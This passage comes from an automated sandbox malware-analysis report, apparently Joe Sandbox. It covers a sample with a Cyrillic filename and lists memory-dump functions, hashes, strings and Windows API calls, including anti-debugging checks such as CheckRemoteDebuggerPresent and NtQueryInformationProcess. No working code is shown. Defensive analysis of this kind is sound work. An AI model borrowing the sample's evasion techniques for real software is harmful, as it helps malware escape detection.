2173->2172 2184 144c7bb-144c80f call 14486e0 2173->2184 2204 144c811 call 144c880 2184->2204 2205 144c811 call 144c890 2184->2205 2197 144c817-144c826 2198 144c828-144c849 2197->2198 2206 144c84c call 144d9c7 2198->2206 2207 144c84c call 144ca10 2198->2207 2208 144c84c call 144d960 2198->2208 2209 144c84c call 144ca01 2198->2209 2199 144c852-144c861 2200 144c863-144c86f 2199->2200 2201 144c87a-144c87f 2199->2201 2200->2198 2202 144c871-144c875 call 1448608 2200->2202 2202->2201 2204->2197 2205->2197 2206->2199 2207->2199 2208->2199 2209->2199
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,8,d$-i6s$Haq$\s]q$;]q$PS7$UrY
                        • API String ID: 0-2408275168
                        • Opcode ID: e952270c26c5e4d67dc321c6451653100bc5c85c2f27acc5fa56ec302900fa00
                        • Instruction ID: 4d249e04f60dd9228438acbc07b66239658626a307ae13ccfc3b9a15e0275651
                        • Opcode Fuzzy Hash: e952270c26c5e4d67dc321c6451653100bc5c85c2f27acc5fa56ec302900fa00
                        • Instruction Fuzzy Hash: D5D1E836F002258FD754DFADD89459EBBE2FFC8220F1A416AE909EB365DA319C05C790
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,aq$:^O$[jY4$zfxv
                        • API String ID: 0-254122083
                        • Opcode ID: 7b94f92b392e523b928ecd978a8f016c68185fa4eec5faeaca30e393224a5ac8
                        • Instruction ID: 1eb33c0c70705839c4c98d2bc3626158436fc70d98c5fdf5efaa273abfc4eb77
                        • Opcode Fuzzy Hash: 7b94f92b392e523b928ecd978a8f016c68185fa4eec5faeaca30e393224a5ac8
                        • Instruction Fuzzy Hash: 0512F676F002258FD714DFACC8945AABBF2AF98210B1641AADD15EB371DA74DC02CBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: jt#$O<
                        • API String ID: 0-2952409307
                        • Opcode ID: 1474b2ec1d19d6588a27949e23a775ed64761d037fb89209f089c8451b14c197
                        • Instruction ID: 235ddfeb7bcdba1d1ebe873d26236de7075f496ed1304468857967139dc7210a
                        • Opcode Fuzzy Hash: 1474b2ec1d19d6588a27949e23a775ed64761d037fb89209f089c8451b14c197
                        • Instruction Fuzzy Hash: 3742E476B401258FEB28EE6DC49853FB6E6BF8C618756046ED906EB3B4DE30CC059790
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: Ev&5$N3Cm
                        • API String ID: 0-1629072489
                        • Opcode ID: 16c2caa91dbcfaf8f3cb2ff96d3da258794d413d932808078180761669a3e7fb
                        • Instruction ID: 59f94211770ae39976e19f33b289ac0480fec29bf4a2a19fd2b68dba090b9cc4
                        • Opcode Fuzzy Hash: 16c2caa91dbcfaf8f3cb2ff96d3da258794d413d932808078180761669a3e7fb
                        • Instruction Fuzzy Hash: 87D18275F047068FEB58CFA9D8D459EBBF2AF98200B15813EE519DB362DA709C46CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: Haq
                        • API String ID: 0-725504367
                        • Opcode ID: b845da97b060786da88ae7dad64eca0b54fae5a6723a726baed76e766ce32615
                        • Instruction ID: 743f3f0aaaa7825fdb2093fc8cf3018ad445cf3f007f7fa4f5a36330dc150ebc
                        • Opcode Fuzzy Hash: b845da97b060786da88ae7dad64eca0b54fae5a6723a726baed76e766ce32615
                        • Instruction Fuzzy Hash: 62728B35A00A05CFC714CF68C498AAEBBF2FF88314B158969D85A9B756D730FD46CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 414cd6e865401b9624cd9b9e20748cdbcd65dde8da624dcc2bd49144ff82a027
                        • Instruction ID: b3398a6d30185d72c32f1272a7bbb92a2c6f08af25a9750d2fc65592c816ef8a
                        • Opcode Fuzzy Hash: 414cd6e865401b9624cd9b9e20748cdbcd65dde8da624dcc2bd49144ff82a027
                        • Instruction Fuzzy Hash: 49C15A70A00B458FDB14DF69D884A6EBBF6FF88304B158A6AC44A9B751DB74EC05CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • GetVolumeInformationA.KERNEL32(?,00000000,?,?,?,?,00000000,?), ref: 02DD6BD1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: InformationVolume
                        • String ID:
                        • API String ID: 2039140958-0
                        • Opcode ID: 555c7832878ca21e7824f4d524f6a67b0a59ac1bdd3aadf0e7ce46bf31f042f2
                        • Instruction ID: 02b0dbc3eec53c42e4ee5dc9d2eec3004a417d05b0d01ae41145c856e6f4747e
                        • Opcode Fuzzy Hash: 555c7832878ca21e7824f4d524f6a67b0a59ac1bdd3aadf0e7ce46bf31f042f2
                        • Instruction Fuzzy Hash: 63C14870D006199FDB24CFA8D891BAEBBF5FF48304F148069E859AB391D774A985CF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • GetVolumeInformationA.KERNEL32(?,00000000,?,?,?,?,00000000,?), ref: 02DD6BD1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: InformationVolume
                        • String ID:
                        • API String ID: 2039140958-0
                        • Opcode ID: 5ad9e6f2412bc8bf82e4c0f35c95dca1a9d475fedb84a58c900283ce20adc56c
                        • Instruction ID: 54b036bc2d38b5afcd86dcb3a18a65a192b0cf0701428ce1931026ce048c12b9
                        • Opcode Fuzzy Hash: 5ad9e6f2412bc8bf82e4c0f35c95dca1a9d475fedb84a58c900283ce20adc56c
                        • Instruction Fuzzy Hash: 67C14770E006198FDB24CFA8D891B9EBBF5FF48304F148469E859A7391DB74A985CF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 0144F0BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: 75d5028504d558d2fa779921168a20b2e259761b1ce9900fa795a047d6e9255b
                        • Instruction ID: 93d6109fa5423146264a751745d21282d6a9e76231d57247afd5cebad78c137b
                        • Opcode Fuzzy Hash: 75d5028504d558d2fa779921168a20b2e259761b1ce9900fa795a047d6e9255b
                        • Instruction Fuzzy Hash: E6315CB19053889FDB01CFADD844ACEBFF4BF4A310F04809AE554E7262D3789948CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 0144F0BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: 803ef157610a9e148df68e4432fdad9cb5efaed10419383d2a05b9e3cb82a9b3
                        • Instruction ID: c592de3b650611fcce7d1bea1573573811553d9c44b49a527de0d9499c59c907
                        • Opcode Fuzzy Hash: 803ef157610a9e148df68e4432fdad9cb5efaed10419383d2a05b9e3cb82a9b3
                        • Instruction Fuzzy Hash: A83112B5A003498FDB14CFADD844ADEBBF0FB88310F10856AE918A7351D379A944CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 0144F0BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: dfc6c088c7ad12b7eefd6a41996d91c58657d32ce218cff39f664d6746e292a5
                        • Instruction ID: 0ef53b08f23c744bb68e769df80903cd5b4e1c8713d4bfc0cc0c59681a86f8b8
                        • Opcode Fuzzy Hash: dfc6c088c7ad12b7eefd6a41996d91c58657d32ce218cff39f664d6746e292a5
                        • Instruction Fuzzy Hash: 9421F0B59003499FDB10CF9ED884ADEBBF4FB48310F10842AE918A7350D378A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: {([]
                        • API String ID: 0-3887154703
                        • Opcode ID: d1747aae4eaede2f35798dd3b6655e858265bba7415ba38ace71008059d72133
                        • Instruction ID: 77244071d7d614559c911c2a8c35b3e878aacf612f770e8c26cf945a96e80101
                        • Opcode Fuzzy Hash: d1747aae4eaede2f35798dd3b6655e858265bba7415ba38ace71008059d72133
                        • Instruction Fuzzy Hash: F7B1E372E006298BCB18DE6DC48459DB7F7BB98714F5A85AAD805FB354D7709C05CBC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CheckRemoteDebuggerPresent.KERNEL32 ref: 0144EE5C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CheckDebuggerPresentRemote
                        • String ID:
                        • API String ID: 3662101638-0
                        • Opcode ID: f14d516e451f99fe90422cde22485dca8cc1540da9f83f770ec0cf8504bc808c
                        • Instruction ID: 3a6502f7da850c91c3b037b36aa3c5450751885b265d21496e9ff8344be25280
                        • Opcode Fuzzy Hash: f14d516e451f99fe90422cde22485dca8cc1540da9f83f770ec0cf8504bc808c
                        • Instruction Fuzzy Hash: 3C1100B58003498FDB20DF9AC445BEEBBF8EB08320F20845AD528A3251D378A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: {([]
                        • API String ID: 0-3887154703
                        • Opcode ID: 746c6103d8d7dfa17e4eb5f2354b494dfca992e9da2876d9e66dd6e85839f2fd
                        • Instruction ID: 514a47cbc99c04682f891f3a2eeb8900be0f02b8b67482c5c511ac1c96b1fb35
                        • Opcode Fuzzy Hash: 746c6103d8d7dfa17e4eb5f2354b494dfca992e9da2876d9e66dd6e85839f2fd
                        • Instruction Fuzzy Hash: 26511533F106394BCB14DEAD88541ADBAE7ABD8654F4A81BADC05FB351D6718C098BD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: zfxv
                        • API String ID: 0-924585857
                        • Opcode ID: 259a902e79d734d2a987bb58a18c6e5f27ba43bf2de33e8008b7bf5dd75ca707
                        • Instruction ID: 8deef75a5d022f4571c34465b7c1da22b48c88bfd8d33f7fd19b1e28a6bd2449
                        • Opcode Fuzzy Hash: 259a902e79d734d2a987bb58a18c6e5f27ba43bf2de33e8008b7bf5dd75ca707
                        • Instruction Fuzzy Hash: 4351E6B7F005368BA714DEADC8805AFB7E2ABA8610716416ADC45FB360DA70DD02CBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 70887d0ba70ca5aec3d51de8ddb6babd12496028b40986f7bea58bb194ccb43d
                        • Instruction ID: 951594d7e5d72297c46b9d9869c39e2346e301605090bd16ee8d9760b575c6f9
                        • Opcode Fuzzy Hash: 70887d0ba70ca5aec3d51de8ddb6babd12496028b40986f7bea58bb194ccb43d
                        • Instruction Fuzzy Hash: D0525B71A00619CFCB15CF68C884BAAB7B6FF44704F5584A9E81AAF261D771FD85CB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4924001646bacf88df108ba14f64d4a3fa120ff6524930bd8c7eb789b817375b
                        • Instruction ID: 1bb6ebe781b2055ab084b6a73be75ed05b1529d8abdb4c82b2cdab26e2b2ff3a
                        • Opcode Fuzzy Hash: 4924001646bacf88df108ba14f64d4a3fa120ff6524930bd8c7eb789b817375b
                        • Instruction Fuzzy Hash: F8E1E135F003158FEB15DFBDC8849AEBBB2BF98300B15816AD505DB362DA709C4ACB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 449491debbd594e091fbda485c3b29005a1d31b853f02ae0b95018df73755192
                        • Instruction ID: 848e8ad48dfc553df98993cdb36ef281f26d656196bb380659cab5329a7331d2
                        • Opcode Fuzzy Hash: 449491debbd594e091fbda485c3b29005a1d31b853f02ae0b95018df73755192
                        • Instruction Fuzzy Hash: 38A18F75E0071A9FCB00DFA4D8549EDBBBAFF89304F158215E41AAB364DB30AC46CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1e49d66fb43bd254695d2df24221bd7d994c270f010300529624123f84be7f18
                        • Instruction ID: 9c767e90d67ee29fddd1b34189b7f2dc9a57260da47c74fee130e516849c1014
                        • Opcode Fuzzy Hash: 1e49d66fb43bd254695d2df24221bd7d994c270f010300529624123f84be7f18
                        • Instruction Fuzzy Hash: 3C918E75E0071A9FCB00DFA4D8949DDBBBAFF89304B158219E419AB3A4DB30AD46CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 32d75844e875c8d399bb156afdb68e9c23e39d693cb4f254b40e8f3388918ee2
                        • Instruction ID: ebf7a71377305ba5748005ac591ba25886b44c60d55d1fed68fd6d1e234686d4
                        • Opcode Fuzzy Hash: 32d75844e875c8d399bb156afdb68e9c23e39d693cb4f254b40e8f3388918ee2
                        • Instruction Fuzzy Hash: 36915E75E0071A9FCB04DFA0D8849DDBBBAFF99304B158215E419AB364DB30ED46CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 09AC08C6
                        • GetCurrentThread.KERNEL32 ref: 09AC0903
                        • GetCurrentProcess.KERNEL32 ref: 09AC0940
                        • GetCurrentThreadId.KERNEL32 ref: 09AC0999
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 484f0f5dba87601c3129a4778ea428dcd46a74e5a0a6a47051ebe172c8240bce
                        • Instruction ID: 73bb127a511d25b817fac6fe04047ef777a11050d199550bdb858438cdab1c49
                        • Opcode Fuzzy Hash: 484f0f5dba87601c3129a4778ea428dcd46a74e5a0a6a47051ebe172c8240bce
                        • Instruction Fuzzy Hash: 205155B0900349CFEB14DFAAD548BAEBBF5EF48314F208459E419A7360D778A944CF65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 09AC08C6
                        • GetCurrentThread.KERNEL32 ref: 09AC0903
                        • GetCurrentProcess.KERNEL32 ref: 09AC0940
                        • GetCurrentThreadId.KERNEL32 ref: 09AC0999
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02DDD682
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02DDD682
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 09AC1951
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateFileW.KERNEL32(00000000,?,?,?,?,?,?), ref: 02DD0482
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateFileMappingW.KERNELBASE(?,?,?,?,?,00000000), ref: 02DD074D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateFileMapping
                        • String ID:
                        • API String ID: 524692379-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09AC0B17
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09AC0B17
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateFileMappingW.KERNELBASE(?,?,?,?,?,00000000), ref: 02DD074D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateFileMapping
                        • String ID:
                        • API String ID: 524692379-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 02DD0B23
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateFileW.KERNEL32(00000000,?,?,?,?,?,?), ref: 02DD0482
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 02DD0B23
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,09ACC3D1,00000800), ref: 09ACC462
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,09ACC3D1,00000800), ref: 09ACC462
                        Memory Dump Source
